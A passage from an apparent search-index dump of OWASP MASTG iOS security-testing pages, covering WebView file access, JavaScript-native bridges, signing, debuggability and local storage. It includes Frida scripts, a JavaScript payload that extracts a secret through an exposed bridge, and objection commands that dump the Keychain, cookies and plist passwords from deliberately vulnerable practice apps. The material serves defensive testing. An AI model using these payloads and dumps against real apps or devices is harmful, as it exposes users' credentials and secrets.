"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#checking-telephone-number-detection","title":"Checking Telephone Number Detection","text":"In Safari on iOS, telephone number detection is on by default. However, you might want to turn it off if your HTML page contains numbers that can be interpreted as phone numbers, but are not phone numbers, or to prevent the DOM document from being modified when parsed by the browser. To turn off telephone number detection in Safari on iOS, use the format-detection meta tag (<meta name = \"format-detection\" content = \"telephone=no\">
). An example of this can be found in the Apple developer documentation. Phone links should be then used (e.g. <a href=\"tel:1-408-555-5555\">1-408-555-5555</a>
) to explicitly create a link.
If it's possible to load local files via a WebView, the app might be vulnerable to directory traversal attacks. This would allow access to all files within the sandbox or even to escape the sandbox with full access to the file system (if the device is jailbroken). It should therefore be verified whether a user can change the filename or path from which the file is loaded, and whether they can edit the loaded file.
To simulate an attack, you may inject your own JavaScript into the WebView with an interception proxy or simply by using dynamic instrumentation. Attempt to access local storage and any native methods and properties that might be exposed to the JavaScript context.
In a real-world scenario, JavaScript can only be injected through a permanent backend Cross-Site Scripting vulnerability or a MITM attack. See the OWASP XSS Prevention Cheat Sheet and the chapter \"iOS Network Communication\" for more information.
For what concerns this section we will learn about:
As we have seen above in \"Testing How WebViews are Loaded\", if \"scenario 2\" of the WKWebViews is loaded, the app will do so by calling URLForResource:withExtension:
and loadHTMLString:baseURL
.
To quickly inspect this, you can use frida-trace and trace all \"loadHTMLString\" and \"URLForResource:withExtension:\" methods.
$ frida-trace -U \"Where's My Browser?\"\n -m \"*[WKWebView *loadHTMLString*]\" -m \"*[* URLForResource:withExtension:]\"\n\n 14131 ms -[NSBundle URLForResource:0x1c0255390 withExtension:0x0]\n 14131 ms URLForResource: web/WKWebView/scenario2.html\n 14131 ms withExtension: 0x0\n 14190 ms -[WKWebView loadHTMLString:0x1c0255390 baseURL:0x0]\n 14190 ms HTMLString: <!DOCTYPE html>\n <html>\n ...\n </html>\n\n 14190 ms baseURL: nil\n
In this case, baseURL
is set to nil
, meaning that the effective origin is \"null\". You can obtain the effective origin by running window.origin
from the JavaScript of the page (this app has an exploitation helper that allows to write and run JavaScript, but you could also implement a MITM or simply use Frida to inject JavaScript, e.g. via evaluateJavaScript:completionHandler
of WKWebView
).
As an additional note regarding UIWebView
s, if you retrieve the effective origin from a UIWebView
where baseURL
is also set to nil
you will see that it is not set to \"null\", instead you'll obtain something similar to the following:
applewebdata://5361016c-f4a0-4305-816b-65411fc1d780\n
This origin \"applewebdata://\" is similar to the \"file://\" origin as it does not implement Same-Origin Policy and allow access to local files and any web resources. In this case, it would be better to set baseURL
to \"about:blank\", this way, the Same-Origin Policy would prevent cross-origin access. However, the recommendation here is to completely avoid using UIWebView
s and go for WKWebView
s instead.
Even if not having the original source code, you can quickly determine if the app's WebViews do allow file access and which kind. For this, simply navigate to the target WebView in the app and inspect all its instances, for each of them get the values mentioned in the static analysis, that is, allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
. This only applies to WKWebView
s (UIWebVIew
s always allow file access).
We continue with our example using the \"Where's My Browser?\" app and Frida REPL, extend the script with the following content:
ObjC.choose(ObjC.classes['WKWebView'], {\n onMatch: function (wk) {\n console.log('onMatch: ', wk);\n console.log('URL: ', wk.URL().toString());\n console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled());\n console.log('allowFileAccessFromFileURLs: ',\n wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString());\n console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());\n console.log('allowUniversalAccessFromFileURLs: ',\n wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString());\n },\n onComplete: function () {\n console.log('done for WKWebView!');\n }\n});\n
If you run it now, you'll have all the information you need:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n\nonMatch: <WKWebView: 0x1508b1200; frame = (0 0; 320 393); layer = <CALayer: 0x1c4238f20>>\nURL: file:///var/mobile/Containers/Data/Application/A654D169-1DB7-429C-9DB9-A871389A8BAA/\n Library/WKWebView/scenario1.html\njavaScriptEnabled: true\nallowFileAccessFromFileURLs: 0\nhasOnlySecureContent: false\nallowUniversalAccessFromFileURLs: 0\n
Both allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
are set to \"0\", meaning that they are disabled. In this app we can go to the WebView configuration and enable allowFileAccessFromFileURLs
. If we do so and re-run the script we will see how it is set to \"1\" this time:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n...\n\nallowFileAccessFromFileURLs: 1\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/","title":"Determining Whether Native Methods Are Exposed Through WebViews","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-uiwebview-javascript-to-native-bridges","title":"Testing UIWebView JavaScript to Native Bridges","text":"Search for code that maps native objects to the JSContext
associated with a WebView and analyze what functionality it exposes, for example no sensitive data should be accessible and exposed to WebViews.
In Objective-C, the JSContext
associated with a UIWebView
is obtained as follows:
[webView valueForKeyPath:@\"documentView.webView.mainFrame.javaScriptContext\"]\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-wkwebview-javascript-to-native-bridges","title":"Testing WKWebView JavaScript to Native Bridges","text":"Verify if a JavaScript to native bridge exists by searching for WKScriptMessageHandler
and check all exposed methods. Then verify how the methods are called.
The following example from \"Where's My Browser?\" demonstrates this.
First we see how the JavaScript bridge is enabled:
func enableJavaScriptBridge(_ enabled: Bool) {\n options_dict[\"javaScriptBridge\"]?.value = enabled\n let userContentController = wkWebViewConfiguration.userContentController\n userContentController.removeScriptMessageHandler(forName: \"javaScriptBridge\")\n\n if enabled {\n let javaScriptBridgeMessageHandler = JavaScriptBridgeMessageHandler()\n userContentController.add(javaScriptBridgeMessageHandler, name: \"javaScriptBridge\")\n }\n}\n
Adding a script message handler with name \"name\"
(or \"javaScriptBridge\"
in the example above) causes the JavaScript function window.webkit.messageHandlers.myJavaScriptMessageHandler.postMessage
to be defined in all frames in all web views that use the user content controller. It can be then used from the HTML file like this:
function invokeNativeOperation() {\n value1 = document.getElementById(\"value1\").value\n value2 = document.getElementById(\"value2\").value\n window.webkit.messageHandlers.javaScriptBridge.postMessage([\"multiplyNumbers\", value1, value2]);\n}\n
The called function resides in JavaScriptBridgeMessageHandler.swift
:
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {\n\n//...\n\ncase \"multiplyNumbers\":\n\n let arg1 = Double(messageArray[1])!\n let arg2 = Double(messageArray[2])!\n result = String(arg1 * arg2)\n//...\n\nlet javaScriptCallBack = \"javascriptBridgeCallBack('\\(functionFromJS)','\\(result)')\"\nmessage.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)\n
The problem here is that the JavaScriptBridgeMessageHandler
not only contains that function, it also exposes a sensitive function:
case \"getSecret\":\n result = \"XSRSOGKC342\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#dynamic-analysis","title":"Dynamic Analysis","text":"At this point you've surely identified all potentially interesting WebViews in the iOS app and got an overview of the potential attack surface (via static analysis, the dynamic analysis techniques that we have seen in previous sections or a combination of them). This would include HTML and JavaScript files, usage of the JSContext
/ JSExport
for UIWebView
and WKScriptMessageHandler
for WKWebView
, as well as which functions are exposed and present in a WebView.
Further dynamic analysis can help you exploit those functions and get sensitive data that they might be exposing. As we have seen in the static analysis, in the previous example it was trivial to get the secret value by performing reverse engineering (the secret value was found in plain text inside the source code) but imagine that the exposed function retrieves the secret from secure storage. In this case, only dynamic analysis and exploitation would help.
The procedure for exploiting the functions starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via various techniques, for example:
stringByEvaluatingJavaScriptFromString:
for UIWebView
and evaluateJavaScript:completionHandler:
for WKWebView
).In order to get the secret from the previous example of the \"Where's My Browser?\" app, you can use one of these techniques to inject the following payload that will reveal the secret by writing it to the \"result\" field of the WebView:
function javascriptBridgeCallBack(name, value) {\n document.getElementById(\"result\").innerHTML=value;\n};\nwindow.webkit.messageHandlers.javaScriptBridge.postMessage([\"getSecret\"]);\n
Of course, you may also use the Exploitation Helper it provides:
See another example for a vulnerable iOS app and function that is exposed to a WebView in [#thiel2] page 156.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/","title":"Making Sure that the App Is Properly Signed","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#static-analysis","title":"Static Analysis","text":"You have to ensure that the app is using the latest code signature format. You can retrieve the signing certificate information from the application's .app file with codesign. Codesign is used to create, check, and display code signatures, as well as inquire into the dynamic status of signed code in the system.
After you get the application's IPA file, re-save it as a ZIP file and decompress the ZIP file. Navigate to the Payload directory, where the application's .app file will be.
Execute the following codesign
command to display the signing information:
$ codesign -dvvv YOURAPP.app\nExecutable=/Users/Documents/YOURAPP/Payload/YOURAPP.app/YOURNAME\nIdentifier=com.example.example\nFormat=app bundle with Mach-O universal (armv7 arm64)\nCodeDirectory v=20200 size=154808 flags=0x0(none) hashes=4830+5 location=embedded\nHash type=sha256 size=32\nCandidateCDHash sha1=455758418a5f6a878bb8fdb709ccfca52c0b5b9e\nCandidateCDHash sha256=fd44efd7d03fb03563b90037f92b6ffff3270c46\nHash choices=sha1,sha256\nCDHash=fd44efd7d03fb03563b90037f92b6ffff3270c46\nSignature size=4678\nAuthority=iPhone Distribution: Example Ltd\nAuthority=Apple Worldwide Developer Relations Certification Authority\nAuthority=Apple Root CA\nSigned Time=4 Aug 2017, 12:42:52\nInfo.plist entries=66\nTeamIdentifier=8LAMR92KJ8\nSealed Resources version=2 rules=12 files=1410\nInternal requirements count=1 size=176\n
There are various ways to distribute your app as described at the Apple documentation, which include using the App Store or via Apple Business Manager for custom or in-house distribution. In case of an in-house distribution scheme, make sure that no ad hoc certificates are used when the app is signed for distribution.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#static-analysis","title":"Static Analysis","text":"Inspect the app entitlements and check the value of get-task-allow
key. If it is set to true
, the app is debuggable.
Using codesign:
$ codesign -d --entitlements - iGoat-Swift.app\n\nExecutable=/Users/owasp/iGoat-Swift/Payload/iGoat-Swift.app/iGoat-Swift\n[Dict]\n [Key] application-identifier\n [Value]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n [Key] com.apple.developer.team-identifier\n [Value]\n [String] TNAJ496RHB\n [Key] get-task-allow\n [Value]\n [Bool] true\n [Key] keychain-access-groups\n [Value]\n [Array]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n````\n\nUsing ldid:\n\n```xml\n$ ldid -e iGoat-Swift.app/iGoat-Swift\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n <key>com.apple.developer.team-identifier</key>\n <string>TNAJ496RHB</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n </array>\n</dict>\n</plist>\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#dynamic-analysis","title":"Dynamic Analysis","text":"Check whether you can attach a debugger directly, using Xcode. Next, check if you can debug the app on a jailbroken device after Clutching it. This is done using the debug-server which comes from the BigBoss repository at Cydia.
Note: if the application is equipped with anti-reverse engineering controls, then the debugger can be detected and stopped.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/","title":"Testing for Debugging Symbols","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#static-analysis","title":"Static Analysis","text":"To verify the existence of debug symbols you can use objdump from binutils or llvm-objdump to inspect all of the app binaries.
In the following snippet we run objdump over TargetApp
(the iOS main app executable) to show the typical output of a binary containing debug symbols which are marked with the d
(debug) flag. Check the objdump man page for information about various other symbol flag characters.
$ objdump --syms TargetApp\n\n0000000100007dc8 l d *UND* -[ViewController handleSubmitButton:]\n000000010000809c l d *UND* -[ViewController touchesBegan:withEvent:]\n0000000100008158 l d *UND* -[ViewController viewDidLoad]\n...\n000000010000916c l d *UND* _disable_gdb\n00000001000091d8 l d *UND* _detect_injected_dylds\n00000001000092a4 l d *UND* _isDebugged\n...\n
To prevent the inclusion of debug symbols, set Strip Debug Symbols During Copy
to YES
via the Xcode project's build settings. Stripping debugging symbols will not only reduce the size of the binary but also increase the difficulty of reverse engineering.
Dynamic analysis is not applicable for finding debugging symbols.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#static-analysis","title":"Static Analysis","text":"You can take the following static analysis approach for the logging statements:
NSLog
, println
, print
, dump
, debugPrint
.#ifdef DEBUG\n // Debug-only code\n#endif\n
The procedure for enabling this behavior in Swift has changed: you need to either set environment variables in your scheme or set them as custom flags in the target's build settings. Please note that the following functions (which allow you to determine whether the app was built in the Swift 2.1 release configuration) aren't recommended, as Xcode 8 and Swift 3 don't support these functions:
_isDebugAssertConfiguration
_isReleaseAssertConfiguration
_isFastAssertConfiguration
.Depending on the application's setup, there may be more logging functions. For example, when CocoaLumberjack is used, static analysis is a bit different.
For the \"debug-management\" code (which is built-in): inspect the storyboards to see whether there are any flows and/or view-controllers that provide functionality different from the functionality the application should support. This functionality can be anything from debug views to printed error messages, from custom stub-response configurations to logs written to files on the application's file system or a remote server.
As a developer, incorporating debug statements into your application's debug version should not be a problem as long as you make sure that the debug statements are never present in the application's release version.
In Objective-C, developers can use preprocessor macros to filter out debug code:
#ifdef DEBUG\n // Debug-only code\n#endif\n
In Swift 2 (with Xcode 7), you have to set custom compiler flags for every target, and compiler flags have to start with \"-D\". So you can use the following annotations when the debug flag MSTG-DEBUG
is set:
#if MSTG-DEBUG\n // Debug-only code\n#endif\n
In Swift 3 (with Xcode 8), you can set Active Compilation Conditions in Build settings/Swift compiler - Custom flags. Instead of a preprocessor, Swift 3 uses conditional compilation blocks based on the defined conditions:
#if DEBUG_LOGGING\n // Debug-only code\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic analysis should be executed on both a simulator and a device because developers sometimes use target-based functions (instead of functions based on a release/debug-mode) to execute the debugging code.
For the other \"manager-based\" debug code: click through the application on both a simulator and a device to see if you can find any functionality that allows an app's profiles to be pre-set, allows the actual server to be selected or allows responses from the API to be selected.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/","title":"Testing Jailbreak Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/#overview","title":"Overview","text":"To test for jailbreak detection install the app on a jailbroken device.
Launch the app and see what happens:
If it implements jailbreak detection, you might notice one of the following things:
Note that crashes might be an indicator of jailbreak detection but the app may be crashing for any other reasons, e.g. it may have a bug. We recommend to test the app on non-jailbroken device first, especially when you're testing preproduction versions.
Launch the app and try to bypass Jailbreak Detection using an automated tool:
If it implements jailbreak detection, you might be able to see indicators of that in the output of the tool. See section \"Automated Jailbreak Detection Bypass\".
Reverse Engineer the app:
The app might be using techniques that are not implemented in the automated tools that you've used. If that's the case you must reverse engineer the app to find proofs. See section \"Manual Jailbreak Detection Bypass\".
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/#overview","title":"Overview","text":"In order to test for anti-debugging detection you can try to attach a debugger to the app and see what happens.
The app should respond in some way. For example by:
Try to hook or reverse engineer the app using the methods from section \"Anti-Debugging Detection\".
Next, work on bypassing the detection and answer the following questions:
Application Source Code Integrity Checks:
Run the app on the device in an unmodified state and make sure that everything works. Then apply patches to the executable using optool, re-sign the app as described in the chapter \"iOS Tampering and Reverse Engineering\", and run it.
The app should respond in some way. For example by:
Work on bypassing the defenses and answer the following questions:
File Storage Integrity Checks:
Go to the app data directories as indicated in section \"Accessing App Data Directories\" and modify some files.
Next, work on bypassing the defenses and answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed on your test device, such as Frida, Cydia Substrate, Cycript or SSL Kill Switch.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
In order to test for emulator detection you can try to run the app on different emulators as indicated in section \"Emulator Detection\" and see what happens.
The app should respond in some way. For example by:
You can also reverse engineer the app using ideas for strings and methods from section \"Emulator Detection\".
Next, work on bypassing this detection and answer the following questions:
Attempt to disassemble the Mach-O in the IPA and any included library files in the \"Frameworks\" directory (.dylib or .framework files), and perform static analysis. At the very least, the app's core functionality (i.e., the functionality meant to be obfuscated) shouldn't be easily discerned. Verify that:
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/","title":"Testing Local Data Storage","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
NSUserDefaults
, databases, KeyChain, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the iOS KeyChain. This includes using envelope encryption (DEK+KEK) or equivalent methods.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#static-analysis","title":"Static Analysis","text":"When you have access to the source code of an iOS app, identify sensitive data that's saved and processed throughout the app. This includes passwords, secret keys, and personally identifiable information (PII), but it may as well include other data identified as sensitive by industry regulations, laws, and company policies. Look for this data being saved via any of the local storage APIs listed below.
Make sure that sensitive data is never stored without appropriate protection. For example, authentication tokens should not be saved in NSUserDefaults
without additional encryption. Also avoid storing encryption keys in .plist
files, hardcoded as strings in code, or generated using a predictable obfuscation function or key derivation function based on stable attributes.
Sensitive data should be stored by using the Keychain API (that stores them inside the Secure Enclave), or stored encrypted using envelope encryption. Envelope encryption, or key wrapping, is a cryptographic construct that uses symmetric encryption to encapsulate key material. Data encryption keys (DEK) can be encrypted with key encryption keys (KEK) which must be securely stored in the Keychain. Encrypted DEK can be stored in NSUserDefaults
or written in files. When required, application reads KEK, then decrypts DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
The encryption must be implemented so that the secret key is stored in the Keychain with secure settings, ideally kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
. This ensures the usage of hardware-backed storage mechanisms. Make sure that the AccessControlFlags
are set according to the security policy of the keys in the KeyChain.
Generic examples of using the KeyChain to store, update, and delete data can be found in the official Apple documentation. The official Apple documentation also includes an example of using Touch ID and passcode protected keys.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#filesystem","title":"Filesystem","text":"Using the source code, examine the different APIs used to store data locally. Make sure that any data is properly encrypted based on its sensitivity.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis","title":"Dynamic Analysis","text":"One way to determine whether sensitive information (like credentials and keys) is stored insecurely without leveraging native iOS functions is to analyze the app's data directory. Triggering all app functionality before the data is analyzed is important because the app may store sensitive data only after specific functionality has been triggered. You can then perform static analysis for the data dump according to generic keywords and app-specific data.
The following steps can be used to determine how the application stores data locally on a jailbroken iOS device:
/var/mobile/Containers/Data/Application/$APP_ID/
grep -iRn \"USERID\"
.You can analyze the app's data directory on a non-jailbroken iOS device by using third-party applications, such as iMazing.
$APP_NAME.imazing
. Rename it to $APP_NAME.zip
.Note that tools like iMazing don't copy data directly from the device. They try to extract data from the backups they create. Therefore, getting all the app data that's stored on the iOS device is impossible: not all folders are included in backups. Use a jailbroken device or repackage the app with Frida and use a tool like objection to access all the data and files.
If you added the Frida library to the app and repackaged it as described in \"Dynamic Analysis on Non-Jailbroken Devices\" (from the \"Tampering and Reverse Engineering on iOS\" chapter), you can use objection to transfer files directly from the app's data directory or read files in objection as explained in the chapter \"Basic Security Testing on iOS\", section \"Host-Device Data Transfer\".
The Keychain contents can be dumped during dynamic analysis. On a jailbroken device, you can use Keychain dumper as described in the chapter \"Basic Security Testing on iOS\".
The path to the Keychain file is
/private/var/Keychains/keychain-2.db\n
On a non-jailbroken device, you can use objection to dump the Keychain items created and stored by the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-xcode-and-ios-simulator","title":"Dynamic Analysis with Xcode and iOS simulator","text":"This test is only available on macOS, as Xcode and the iOS simulator is needed.
For testing the local storage and verifying what data is stored within it, it's not mandatory to have an iOS device. With access to the source code and Xcode the app can be build and deployed in the iOS simulator. The file system of the current device of the iOS simulator is available in ~/Library/Developer/CoreSimulator/Devices
.
Once the app is running in the iOS simulator, you can navigate to the directory of the latest simulator started with the following command:
$ cd ~/Library/Developer/CoreSimulator/Devices/$(\nls -alht ~/Library/Developer/CoreSimulator/Devices | head -n 2 |\nawk '{print $9}' | sed -n '1!p')/data/Containers/Data/Application\n
The command above will automatically find the UUID of the latest simulator started. Now you still need to grep for your app name or a keyword in your app. This will show you the UUID of the app.
grep -iRn keyword .\n
Then you can monitor and verify the changes in the filesystem of the app and investigate if any sensitive information is stored within the files while using the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-objection","title":"Dynamic Analysis with Objection","text":"You can use the objection runtime mobile exploration toolkit to find vulnerabilities caused by the application's data storage mechanism. Objection can be used without a Jailbroken device, but it will require patching the iOS Application.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#reading-the-keychain","title":"Reading the Keychain","text":"To use Objection to read the Keychain, execute the following command:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-binary-cookies","title":"Searching for Binary Cookies","text":"iOS applications often store binary cookie files in the application sandbox. Cookies are binary files containing cookie data for application WebViews. You can use objection to convert these files to a JSON format and inspect the data.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json\n[\n {\n \"domain\": \"highaltitudehacks.com\",\n \"expiresDate\": \"2051-09-15 07:46:43 +0000\",\n \"isHTTPOnly\": \"false\",\n \"isSecure\": \"false\",\n \"name\": \"username\",\n \"path\": \"/\",\n \"value\": \"admin123\",\n \"version\": \"0\"\n }\n]\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-property-list-files","title":"Searching for Property List Files","text":"iOS applications often store data in property list (plist) files that are stored in both the application sandbox and the IPA package. Sometimes these files contain sensitive information, such as usernames and passwords; therefore, the contents of these files should be inspected during iOS assessments. Use the ios plist cat plistFileName.plist
command to inspect the plist file.
To find the file userInfo.plist, use the env
command. It will print out the locations of the applications Library, Caches and Documents directories:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # env\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /private/var/containers/Bundle/Application/B2C8E457-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCachesDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library\n
Go to the Documents directory and list all files using ls
.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Owner Group Size Creation Name\n------------ ------- ------------------------------------ ------ ------- ------------ ------------ -------- ------------------------- ------------------------\nDirectory 493 n/a True True mobile (501) mobile (501) 192.0 B 2020-02-12 07:03:51 +0000 default.realm.management\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 16.0 KiB 2020-02-12 07:03:51 +0000 default.realm\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 1.2 KiB 2020-02-12 07:03:51 +0000 default.realm.lock\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 284.0 B 2020-05-29 18:15:23 +0000 userInfo.plist\nUnknown 384 n/a True True mobile (501) mobile (501) 0.0 B 2020-02-12 07:03:51 +0000 default.realm.note\n\nReadable: True Writable: True\n
Execute the ios plist cat
command to inspect the content of userInfo.plist file.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios plist cat userInfo.plist\n{\n password = password123;\n username = userName;\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-sqlite-databases","title":"Searching for SQLite Databases","text":"iOS applications typically use SQLite databases to store data required by the application. Testers should check the data protection values of these files and their contents for sensitive data. Objection contains a module to interact with SQLite databases. It allows to dump the schema, their tables and query the records.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # sqlite connect Model.sqlite\nCaching local copy of database file...\nDownloading /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nValidating SQLite database format\nConnected to SQLite database at: Model.sqlite\n\nSQLite @ Model.sqlite > .tables\n+--------------+\n| name |\n+--------------+\n| ZUSER |\n| Z_METADATA |\n| Z_MODELCACHE |\n| Z_PRIMARYKEY |\n+--------------+\nTime: 0.013s\n\nSQLite @ Model.sqlite > select * from Z_PRIMARYKEY\n+-------+--------+---------+-------+\n| Z_ENT | Z_NAME | Z_SUPER | Z_MAX |\n+-------+--------+---------+-------+\n| 1 | User | 0 | 0 |\n+-------+--------+---------+-------+\n1 row in set\nTime: 0.013s\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-cache-databases","title":"Searching for Cache Databases","text":"By default NSURLSession stores data, such as HTTP requests and responses in the Cache.db database. This database can contain sensitive data, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (/var/mobile/Containers/Data/Application/<UUID>
) and go to /Library/Caches/<Bundle Identifier>
. The WebKit cache is also being stored in the Cache.db file. Objection can open and interact with the database with the command sqlite connect Cache.db
, as it is a normal SQLite database.
It is recommended to disable Caching this data, as it may contain sensitive information in the request or response. The following list below shows different ways of achieving this:
removeAllCachedResponses
You can call this method as follows:URLCache.shared.removeAllCachedResponses()
This method will remove all cached requests and responses from Cache.db file.
Apple documentation:
An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn\u2019t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.
Use the following keywords to check the app's source code for predefined and custom logging statements:
A generalized approach to this issue is to use a define to enable NSLog
statements for development and debugging, then disable them before shipping the software. You can do this by adding the following code to the appropriate PREFIX_HEADER (*.pch) file:
#ifdef DEBUG\n# define NSLog (...) NSLog(__VA_ARGS__)\n#else\n# define NSLog (...)\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0053/#dynamic-analysis","title":"Dynamic Analysis","text":"In the section \"Monitoring System Logs\" of the chapter \"iOS Basic Security Testing\" various methods for checking the device logs are explained. Navigate to a screen that displays input fields that take sensitive user information.
After starting one of the methods, fill in the input fields. If sensitive data is displayed in the output, the app fails this test.
